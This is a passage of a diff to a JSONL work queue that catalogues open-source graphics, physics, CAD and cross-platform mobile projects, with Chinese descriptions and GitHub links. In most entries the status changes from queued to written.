逆渲染论文实现常见基线"},"url":"https://github.com/mitsuba-renderer/mitsuba3","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"gimp","area":"projects","topic":"graphics","title":"GIMP — GNU 图像处理程序","meta":{"col3":"~1.4k","col4":"C 写的 Photoshop 开源对标,30 年老树,脚本 + 滤镜 + 图层栈"},"url":"https://github.com/GNOME/gimp","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"kdenlive","area":"projects","topic":"graphics","title":"Kdenlive — KDE 非线性视频剪辑","meta":{"col3":"~750","col4":"MLT 框架 + Qt UI,免费视频剪辑首选之一,多轨 / 滤镜 / 关键帧全"},"url":"https://github.com/KDE/kdenlive","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"tiled","area":"projects","topic":"graphics","title":"Tiled Map Editor — 通用 2D 关卡编辑","meta":{"col3":"~11k","col4":"Tile/Object/Group 标准化 2D 地图格式,几乎所有 2D 引擎都能读"},"url":"https://github.com/mapeditor/tiled","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"aseprite","area":"projects","topic":"graphics","title":"Aseprite — 像素艺术 / 动画编辑器","meta":{"col3":"~33k","col4":"像素图 + 时间线动画工业标准,源码公开(许可受限),独立游戏首选"},"url":"https://github.com/aseprite/aseprite","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"piskel","area":"projects","topic":"graphics","title":"Piskel — Web 像素艺术编辑器","meta":{"col3":"~11k","col4":"浏览器即开即画,Google 工程师出品的 Aseprite 网页轻量版"},"url":"https://github.com/piskelapp/piskel","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} -{"slug":"libsdl","area":"projects","topic":"graphics","title":"SDL — Simple DirectMedia Layer","meta":{"col3":"~10k","col4":"跨平台多媒体层,几乎所有开源游戏的窗口 / 输入 / 音频底层"},"url":"https://github.com/libsdl-org/SDL","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"regl","area":"projects","topic":"graphics","title":"regl — 函数式 WebGL 封装","meta":{"col3":"~6.1k","col4":"Mikola Lysenko 出品,\"调用即绘制\"无副作用,Observable 数据可视化常用"},"url":"https://github.com/regl-project/regl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"twgl","area":"projects","topic":"graphics","title":"twgl.js — 极薄 WebGL helpers","meta":{"col3":"~2k","col4":"greggman(WebGL Fundamentals 作者)出品,去样板代码不抽象掉 API"},"url":"https://github.com/greggman/twgl.js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"picogl","area":"projects","topic":"graphics","title":"PicoGL.js — 极简 WebGL2 包装","meta":{"col3":"~1.6k","col4":"\"把 WebGL2 写成像 OpenGL\"的一千行实现,理解 GL 调用单元最佳"},"url":"https://github.com/tsherif/picogl.js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:06:03.584Z"} +{"slug":"luma-gl","area":"projects","topic":"graphics","title":"luma.gl — vis.gl WebGL2/WebGPU 抽象","meta":{"col3":"~3k","col4":"Uber vis.gl 团队出品,deck.gl 基座,跨 WebGL2/WebGPU 统一层"},"url":"https://github.com/visgl/luma.gl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:08:39.570Z"} +{"slug":"deck-gl","area":"projects","topic":"graphics","title":"deck.gl — Uber 大规模数据可视化","meta":{"col3":"~12k","col4":"千万级点 + 地理坐标 + 分层 API,把 GIS 渲染做成声明式"},"url":"https://github.com/visgl/deck.gl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:11:06.559Z"} +{"slug":"bullet","area":"projects","topic":"graphics","title":"Bullet — C++ 经典 3D 物理引擎","meta":{"col3":"~13k","col4":"Erwin Coumans 出品,刚体 / 软体 / 布料一应俱全,影视游戏通吃"},"url":"https://github.com/bulletphysics/bullet3","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"box2d","area":"projects","topic":"graphics","title":"Box2D — Erin Catto C++ 2D 物理","meta":{"col3":"~7.7k","col4":"2D 物理算法之父,Angry Birds 同款,所有 JS 端口都从它派生"},"url":"https://github.com/erincatto/box2d","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:18:45.167Z"} +{"slug":"matter-js","area":"projects","topic":"graphics","title":"matter.js — JS 2D 刚体物理","meta":{"col3":"~17k","col4":"Web 端最易上手物理引擎,rigid body + constraint + 直接渲染"},"url":"https://github.com/liabru/matter-js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:22:14.049Z"} +{"slug":"cannon-es","area":"projects","topic":"graphics","title":"cannon-es — pmndrs 维护的 cannon.js 续","meta":{"col3":"~2.4k","col4":"three.js 生态默认 3D 物理,原 cannon.js 停滞后社区接手"},"url":"https://github.com/pmndrs/cannon-es","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:23:49.995Z"} +{"slug":"planck","area":"projects","topic":"graphics","title":"planck.js — Box2D 纯 JS 移植","meta":{"col3":"~4.6k","col4":"不依赖 Emscripten 的纯 JS Box2D,便于阅读源码学物理算法"},"url":"https://github.com/piqnt/planck.js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:27:30.141Z"} +{"slug":"rapier","area":"projects","topic":"graphics","title":"Rapier — Rust 现代物理引擎","meta":{"col3":"~4.5k","col4":"2D/3D 同源 + 确定性 + WASM 优秀,bevy/three.js 都能用"},"url":"https://github.com/dimforge/rapier","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"glslify","area":"projects","topic":"graphics","title":"glslify — Browserify 风格 GLSL 模块","meta":{"col3":"~2.4k","col4":"把 require() 引入 shader 世界,npm 上百个着色器函数可即插即用"},"url":"https://github.com/glslify/glslify","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:34:02.911Z"} +{"slug":"glsl-canvas","area":"projects","topic":"graphics","title":"glslCanvas — Book of Shaders 配套库","meta":{"col3":"~1.5k","col4":"Patricio Gonzalez Vivo 出品,把 Shadertoy 写法直接嵌进网页"},"url":"https://github.com/patriciogonzalezvivo/glslCanvas","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:39:05.218Z"} +{"slug":"shader-park","area":"projects","topic":"graphics","title":"Shader Park — 程序化 SDF 着色器 DSL","meta":{"col3":"~700","col4":"JS DSL 描述 SDF 场景,自动编译 GLSL,让算法艺术更易写"},"url":"https://github.com/shader-park/shader-park-core","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"hydra-synth","area":"projects","topic":"graphics","title":"Hydra — 实时视觉合成 livecoding","meta":{"col3":"~2.7k","col4":"Olivia Jack 出品,浏览器里写 chain API 即生成动态视觉,VJ 圈宠"},"url":"https://github.com/ojack/hydra","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:47:04.937Z"} +{"slug":"spectorjs","area":"projects","topic":"graphics","title":"Spector.js — WebGL/WebGPU 调试器","meta":{"col3":"~2.7k","col4":"BabylonJS 团队出品,一键抓取每帧 GL 调用并可视化,调试必备"},"url":"https://github.com/BabylonJS/Spector.js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:48:54.076Z"} +{"slug":"assimp","area":"projects","topic":"graphics","title":"Assimp — Open Asset Import Library","meta":{"col3":"~11k","col4":"50+ 种 3D 格式统一为 aiScene,FBX/OBJ/glTF 通吃,引擎导入标配"},"url":"https://github.com/assimp/assimp","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:53:56.519Z"} +{"slug":"draco","area":"projects","topic":"graphics","title":"Draco — Google 3D 网格压缩","meta":{"col3":"~7k","col4":"顶点 / UV / 法线压缩到 5-10x,Google Maps / glTF 默认压缩方案"},"url":"https://github.com/google/draco","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T05:55:16.384Z"} +{"slug":"gltf-transform","area":"projects","topic":"graphics","title":"glTF Transform — glTF 资产工具链","meta":{"col3":"~1.6k","col4":"Don McCurdy 出品,命令行 + JS API 优化 / 转换 / 检查 glTF"},"url":"https://github.com/donmccurdy/glTF-Transform","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md"} +{"slug":"open3d","area":"projects","topic":"graphics","title":"Open3D — 现代点云 / 几何库","meta":{"col3":"~12k","col4":"C++ 内核 + Python 接口,深度学习友好,激光雷达 / SLAM 工程默认"},"url":"https://github.com/isl-org/Open3D","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:06:01.992Z"} +{"slug":"pcl","area":"projects","topic":"graphics","title":"PCL — Point Cloud Library","meta":{"col3":"~10k","col4":"学术界点云算法集大成,KdTree / VoxelGrid / RANSAC 全家桶"},"url":"https://github.com/PointCloudLibrary/pcl","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:11:05.044Z"} +{"slug":"spine-runtimes","area":"projects","topic":"graphics","title":"Spine Runtimes — 2D 骨骼动画运行时","meta":{"col3":"~3.7k","col4":"Esoteric Software 出品,配套商业编辑器但运行时 OSS,10+ 引擎适配"},"url":"https://github.com/EsotericSoftware/spine-runtimes","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:16:07.929Z"} +{"slug":"dragonbones","area":"projects","topic":"graphics","title":"DragonBones — 国产开源骨骼动画","meta":{"col3":"~1k","col4":"Egret 出品,Spine 国产对位 + 网格变形 + 多语言运行时"},"url":"https://github.com/DragonBones/DragonBonesCPP","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:21:11.340Z"} +{"slug":"rive","area":"projects","topic":"graphics","title":"Rive — 交互动画运行时","meta":{"col3":"~7k","col4":"状态机 + 矢量动画 + 跨平台 runtime,把动画做成可交互组件"},"url":"https://github.com/rive-app/rive-runtime","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:26:15.021Z"} +{"slug":"thorvg","area":"projects","topic":"graphics","title":"ThorVG — 轻量矢量图形引擎","meta":{"col3":"~2k","col4":"C++ 矢量引擎,SVG/Lottie,Tizen/LVGL/Godot 嵌入式与 WebGPU"},"url":"https://github.com/thorvg/thorvg","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T12:00:00.000Z"} +{"slug":"aframe","area":"projects","topic":"graphics","title":"A-Frame — Web VR 框架","meta":{"col3":"~17k","col4":"Mozilla 系出品,HTML 标签写 VR 场景,three.js 上面的声明式层"},"url":"https://github.com/aframevr/aframe","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:28:28.287Z"} +{"slug":"mind-ar-js","area":"projects","topic":"graphics","title":"MindAR — Web 图像/人脸 AR","meta":{"col3":"~2.6k","col4":"纯 JS 实现的图像追踪 + 人脸 AR,无需 ARKit/ARCore"},"url":"https://github.com/hiukim/mind-ar-js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:36:38.222Z"} +{"slug":"ar-js","area":"projects","topic":"graphics","title":"AR.js — Web AR 标记追踪","meta":{"col3":"~5.5k","col4":"浏览器里跑 marker / location AR,移动端 60fps + 不用 App"},"url":"https://github.com/AR-js-org/AR.js","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:41:41.757Z"} +{"slug":"openxr-sdk","area":"projects","topic":"graphics","title":"OpenXR SDK — Khronos VR/AR 标准","meta":{"col3":"~1k","col4":"多家头显厂商共同后端,VR/AR 跨设备 API 标准,参考实现仓库"},"url":"https://github.com/KhronosGroup/OpenXR-SDK-Source","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:46:20.604Z"} +{"slug":"openscad","area":"projects","topic":"graphics","title":"OpenSCAD — 脚本式 CAD","meta":{"col3":"~8k","col4":"\"代码即模型\"的程序员 CAD,3D 打印社区默认工具"},"url":"https://github.com/openscad/openscad","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:51:23.781Z"} +{"slug":"freecad","area":"projects","topic":"graphics","title":"FreeCAD — 参数化 CAD","meta":{"col3":"~22k","col4":"全功能参数化 CAD,PartDesign / 装配 / 工程图,对标 SolidWorks"},"url":"https://github.com/FreeCAD/FreeCAD","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T06:56:25.272Z"} +{"slug":"librecad","area":"projects","topic":"graphics","title":"LibreCAD — 2D 工程绘图","meta":{"col3":"~2.2k","col4":"Qt 写的 AutoCAD-like 2D,DXF 原生,制图教学起点"},"url":"https://github.com/LibreCAD/LibreCAD","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:06:31.739Z"} +{"slug":"kicad","area":"projects","topic":"graphics","title":"KiCad — 电子电路 CAD","meta":{"col3":"~2.5k","col4":"原理图 + PCB + 3D 预览,CERN 加持的开源 EDA 旗舰"},"url":"https://github.com/KiCad/kicad-source-mirror","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:11:34.922Z"} +{"slug":"appleseed","area":"projects","topic":"graphics","title":"appleseed — 物理渲染器","meta":{"col3":"~2.3k","col4":"现代离线渲染器,BVH / OSL / 光谱采样齐全,Maya/Blender 插件接入"},"url":"https://github.com/appleseedhq/appleseed","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:16:38.119Z"} +{"slug":"luxcorerender","area":"projects","topic":"graphics","title":"LuxCoreRender — 物理光线追踪","meta":{"col3":"~1.1k","col4":"LuxRender 续作,PathTracing + BiPathTracing + GPU,研究友好"},"url":"https://github.com/LuxCoreRender/LuxCore","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:21:41.361Z"} +{"slug":"mitsuba3","area":"projects","topic":"graphics","title":"Mitsuba 3 — 研究向可微渲染器","meta":{"col3":"~2.2k","col4":"EPFL 出品,可微渲染 + JIT 编译,神经辐射场 / 逆渲染论文实现常见基线"},"url":"https://github.com/mitsuba-renderer/mitsuba3","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:26:44.937Z"} +{"slug":"gimp","area":"projects","topic":"graphics","title":"GIMP — GNU 图像处理程序","meta":{"col3":"~1.4k","col4":"C 写的 Photoshop 开源对标,30 年老树,脚本 + 滤镜 + 图层栈"},"url":"https://github.com/GNOME/gimp","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:31:48.170Z"} +{"slug":"kdenlive","area":"projects","topic":"graphics","title":"Kdenlive — KDE 非线性视频剪辑","meta":{"col3":"~750","col4":"MLT 框架 + Qt UI,免费视频剪辑首选之一,多轨 / 滤镜 / 关键帧全"},"url":"https://github.com/KDE/kdenlive","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:36:51.412Z"} +{"slug":"tiled","area":"projects","topic":"graphics","title":"Tiled Map Editor — 通用 2D 关卡编辑","meta":{"col3":"~11k","col4":"Tile/Object/Group 标准化 2D 地图格式,几乎所有 2D 引擎都能读"},"url":"https://github.com/mapeditor/tiled","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:41:54.668Z"} +{"slug":"aseprite","area":"projects","topic":"graphics","title":"Aseprite — 像素艺术 / 动画编辑器","meta":{"col3":"~33k","col4":"像素图 + 时间线动画工业标准,源码公开(许可受限),独立游戏首选"},"url":"https://github.com/aseprite/aseprite","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:46:57.849Z"} +{"slug":"piskel","area":"projects","topic":"graphics","title":"Piskel — Web 像素艺术编辑器","meta":{"col3":"~11k","col4":"浏览器即开即画,Google 工程师出品的 Aseprite 网页轻量版"},"url":"https://github.com/piskelapp/piskel","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:52:01.039Z"} +{"slug":"libsdl","area":"projects","topic":"graphics","title":"SDL — Simple DirectMedia Layer","meta":{"col3":"~10k","col4":"跨平台多媒体层,几乎所有开源游戏的窗口 / 输入 / 音频底层"},"url":"https://github.com/libsdl-org/SDL","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-graphics.md","written_at":"2026-06-13T07:57:04.229Z"} {"slug":"ffmpeg","area":"projects","topic":"media","title":"FFmpeg — 多媒体处理瑞士军刀","meta":{"col3":"~50k","col4":"libavcodec / libavformat / libavfilter 三件套是几乎所有视频工具的底层"},"url":"https://github.com/FFmpeg/FFmpeg","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-media.md"} {"slug":"handbrake","area":"projects","topic":"media","title":"HandBrake — GUI 转码器","meta":{"col3":"~13k","col4":"在 ffmpeg / x264 上做产品化封装的成熟开源案例"},"url":"https://github.com/HandBrake/HandBrake","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-media.md"} {"slug":"mlt","area":"projects","topic":"media","title":"MLT — 多媒体编辑框架","meta":{"col3":"~1.6k","col4":"Producer + Filter + Consumer 流式抽象,开源 NLE 引擎模板"},"url":"https://github.com/mltframework/mlt","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-media.md"} @@ -1423,71 +1424,71 @@ {"slug":"nodegui","area":"projects","topic":"mobile","title":"nodegui","meta":{"col3":"Qt 5 + Node.js 桌面框架,CSS 样式 + 原生组件(无 webview)","col4":"9k"},"url":"https://github.com/nodegui/nodegui","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} {"slug":"neutralinojs","area":"projects","topic":"mobile","title":"neutralinojs","meta":{"col3":"极简轻量桌面框架,单二进制 < 2MB(系统 webview + 自家 IPC)","col4":"9k"},"url":"https://github.com/neutralinojs/neutralinojs","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} {"slug":"electron-builder","area":"projects","topic":"mobile","title":"electron-builder","meta":{"col3":"Electron 打包发布事实标准(autoupdate / 签名 / 多平台 installer)","col4":"14k"},"url":"https://github.com/electron-userland/electron-builder","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"electron-forge","area":"projects","topic":"mobile","title":"electron-forge","meta":{"col3":"Electron 官方脚手架 + 打包工具(替代 builder 的官方答案)","col4":"7k"},"url":"https://github.com/electron/forge","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"flutter-rust-bridge","area":"projects","topic":"mobile","title":"flutter-rust-bridge","meta":{"col3":"Dart ↔ Rust FFI 代码生成器,让 Flutter 调 Rust 像调本地函数","col4":"5k"},"url":"https://github.com/fzyzcjy/flutter_rust_bridge","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"flame","area":"projects","topic":"mobile","title":"flame","meta":{"col3":"Flutter 上的 2D 游戏引擎,组件树 + ECS + 物理引擎","col4":"9k"},"url":"https://github.com/flame-engine/flame","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"flutter-quill","area":"projects","topic":"mobile","title":"flutter-quill","meta":{"col3":"Flutter 富文本编辑器,移植自 Web 的 Quill.js(Delta 格式)","col4":"3k"},"url":"https://github.com/singerdmx/flutter-quill","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"fvm","area":"projects","topic":"mobile","title":"fvm","meta":{"col3":"Flutter 多版本管理器(类似 nvm,按项目锁 SDK 版本)","col4":"5k"},"url":"https://github.com/leoafarias/fvm","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"flutterfire","area":"projects","topic":"mobile","title":"flutterfire","meta":{"col3":"Firebase 官方 Flutter SDK monorepo(Auth / Firestore / Cloud Messaging 全套)","col4":"9k"},"url":"https://github.com/firebase/flutterfire","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"react-native-web","area":"projects","topic":"mobile","title":"react-native-web","meta":{"col3":"RN 渲染到 Web(一套代码 iOS / Android / Web 三端,twitter.com 用此)","col4":"22k"},"url":"https://github.com/necolas/react-native-web","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"react-native-windows","area":"projects","topic":"mobile","title":"react-native-windows","meta":{"col3":"微软维护的 RN Windows / UWP 端","col4":"17k"},"url":"https://github.com/microsoft/react-native-windows","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"react-native-macos","area":"projects","topic":"mobile","title":"react-native-macos","meta":{"col3":"微软维护的 RN macOS 端,与 windows 共享 fabric 实现","col4":"17k"},"url":"https://github.com/microsoft/react-native-macos","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"react-native-paper","area":"projects","topic":"mobile","title":"react-native-paper","meta":{"col3":"Material Design 风格的 RN UI 组件库(Callstack 维护)","col4":"13k"},"url":"https://github.com/callstack/react-native-paper","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"nativewind","area":"projects","topic":"mobile","title":"nativewind","meta":{"col3":"Tailwind CSS for RN(通过 babel 转 className → StyleSheet)","col4":"6k"},"url":"https://github.com/nativewind/nativewind","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"tamagui","area":"projects","topic":"mobile","title":"tamagui","meta":{"col3":"跨 React + RN UI 框架,编译时静态优化样式(atomic CSS + StyleSheet)","col4":"14k"},"url":"https://github.com/tamagui/tamagui","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"native-base","area":"projects","topic":"mobile","title":"native-base","meta":{"col3":"RN UI 库(pre-tamagui 时代主流),跨平台主题系统","col4":"21k"},"url":"https://github.com/GeekyAnts/NativeBase","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"taro","area":"projects","topic":"mobile","title":"taro","meta":{"col3":"京东多端框架(React/Vue → 微信小程序 / H5 / RN / 支付宝小程序 / 抖音小程序)","col4":"36k"},"url":"https://github.com/NervJS/taro","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"uni-app","area":"projects","topic":"mobile","title":"uni-app","meta":{"col3":"DCloud 多端框架(Vue → 6 大小程序 + H5 + iOS/Android APP)","col4":"40k"},"url":"https://github.com/dcloudio/uni-app","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"kbone","area":"projects","topic":"mobile","title":"kbone","meta":{"col3":"腾讯出品,让 Web 框架(Vue/React)的代码跑在微信小程序里","col4":"5k"},"url":"https://github.com/Tencent/kbone","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"chameleon","area":"projects","topic":"mobile","title":"chameleon","meta":{"col3":"滴滴多端统一开发框架,自家 DSL 编译到 Web / 小程序 / Weex","col4":"8k"},"url":"https://github.com/didi/chameleon","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"electron-forge","area":"projects","topic":"mobile","title":"electron-forge","meta":{"col3":"Electron 官方脚手架 + 打包工具(替代 builder 的官方答案)","col4":"7k"},"url":"https://github.com/electron/forge","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"flutter-rust-bridge","area":"projects","topic":"mobile","title":"flutter-rust-bridge","meta":{"col3":"Dart ↔ Rust FFI 代码生成器,让 Flutter 调 Rust 像调本地函数","col4":"5k"},"url":"https://github.com/fzyzcjy/flutter_rust_bridge","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"flame","area":"projects","topic":"mobile","title":"flame","meta":{"col3":"Flutter 上的 2D 游戏引擎,组件树 + ECS + 物理引擎","col4":"9k"},"url":"https://github.com/flame-engine/flame","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"flutter-quill","area":"projects","topic":"mobile","title":"flutter-quill","meta":{"col3":"Flutter 富文本编辑器,移植自 Web 的 Quill.js(Delta 格式)","col4":"3k"},"url":"https://github.com/singerdmx/flutter-quill","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:23:50.000Z"} +{"slug":"fvm","area":"projects","topic":"mobile","title":"fvm","meta":{"col3":"Flutter 多版本管理器(类似 nvm,按项目锁 SDK 版本)","col4":"5k"},"url":"https://github.com/leoafarias/fvm","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:27:16.563Z"} +{"slug":"flutterfire","area":"projects","topic":"mobile","title":"flutterfire","meta":{"col3":"Firebase 官方 Flutter SDK monorepo(Auth / Firestore / Cloud Messaging 全套)","col4":"9k"},"url":"https://github.com/firebase/flutterfire","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:29:00.332Z"} +{"slug":"react-native-web","area":"projects","topic":"mobile","title":"react-native-web","meta":{"col3":"RN 渲染到 Web(一套代码 iOS / Android / Web 三端,twitter.com 用此)","col4":"22k"},"url":"https://github.com/necolas/react-native-web","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:34:02.923Z"} +{"slug":"react-native-windows","area":"projects","topic":"mobile","title":"react-native-windows","meta":{"col3":"微软维护的 RN Windows / UWP 端","col4":"17k"},"url":"https://github.com/microsoft/react-native-windows","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:39:05.224Z"} +{"slug":"react-native-macos","area":"projects","topic":"mobile","title":"react-native-macos","meta":{"col3":"微软维护的 RN macOS 端,与 windows 共享 fabric 实现","col4":"17k"},"url":"https://github.com/microsoft/react-native-macos","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"react-native-paper","area":"projects","topic":"mobile","title":"react-native-paper","meta":{"col3":"Material Design 风格的 RN UI 组件库(Callstack 维护)","col4":"13k"},"url":"https://github.com/callstack/react-native-paper","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:47:04.947Z"} +{"slug":"nativewind","area":"projects","topic":"mobile","title":"nativewind","meta":{"col3":"Tailwind CSS for RN(通过 babel 转 className → StyleSheet)","col4":"6k"},"url":"https://github.com/nativewind/nativewind","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:48:54.095Z"} +{"slug":"tamagui","area":"projects","topic":"mobile","title":"tamagui","meta":{"col3":"跨 React + RN UI 框架,编译时静态优化样式(atomic CSS + StyleSheet)","col4":"14k"},"url":"https://github.com/tamagui/tamagui","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T05:53:56.525Z"} +{"slug":"native-base","area":"projects","topic":"mobile","title":"native-base","meta":{"col3":"RN UI 库(pre-tamagui 时代主流),跨平台主题系统","col4":"21k"},"url":"https://github.com/GeekyAnts/NativeBase","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"taro","area":"projects","topic":"mobile","title":"taro","meta":{"col3":"京东多端框架(React/Vue → 微信小程序 / H5 / RN / 支付宝小程序 / 抖音小程序)","col4":"36k"},"url":"https://github.com/NervJS/taro","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:06:02.110Z"} +{"slug":"uni-app","area":"projects","topic":"mobile","title":"uni-app","meta":{"col3":"DCloud 多端框架(Vue → 6 大小程序 + H5 + iOS/Android APP)","col4":"40k"},"url":"https://github.com/dcloudio/uni-app","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:11:05.174Z"} +{"slug":"kbone","area":"projects","topic":"mobile","title":"kbone","meta":{"col3":"腾讯出品,让 Web 框架(Vue/React)的代码跑在微信小程序里","col4":"5k"},"url":"https://github.com/Tencent/kbone","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:16:08.061Z"} +{"slug":"chameleon","area":"projects","topic":"mobile","title":"chameleon","meta":{"col3":"滴滴多端统一开发框架,自家 DSL 编译到 Web / 小程序 / Weex","col4":"8k"},"url":"https://github.com/didi/chameleon","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:21:11.478Z"} {"slug":"mpvue","area":"projects","topic":"mobile","title":"mpvue","meta":{"col3":"美团出品的 Vue → 微信小程序编译器(仅维护,但作为案例研究价值高)","col4":"21k"},"url":"https://github.com/Meituan-Dianping/mpvue","status":"blacklisted","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","reason":"red-line-word-detected"} -{"slug":"remax","area":"projects","topic":"mobile","title":"remax","meta":{"col3":"阿里出品 React → 小程序(不写自家 DSL,直接复用 React 运行时)","col4":"6k"},"url":"https://github.com/remaxjs/remax","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"swift-collections","area":"projects","topic":"mobile","title":"swift-collections","meta":{"col3":"Apple 官方 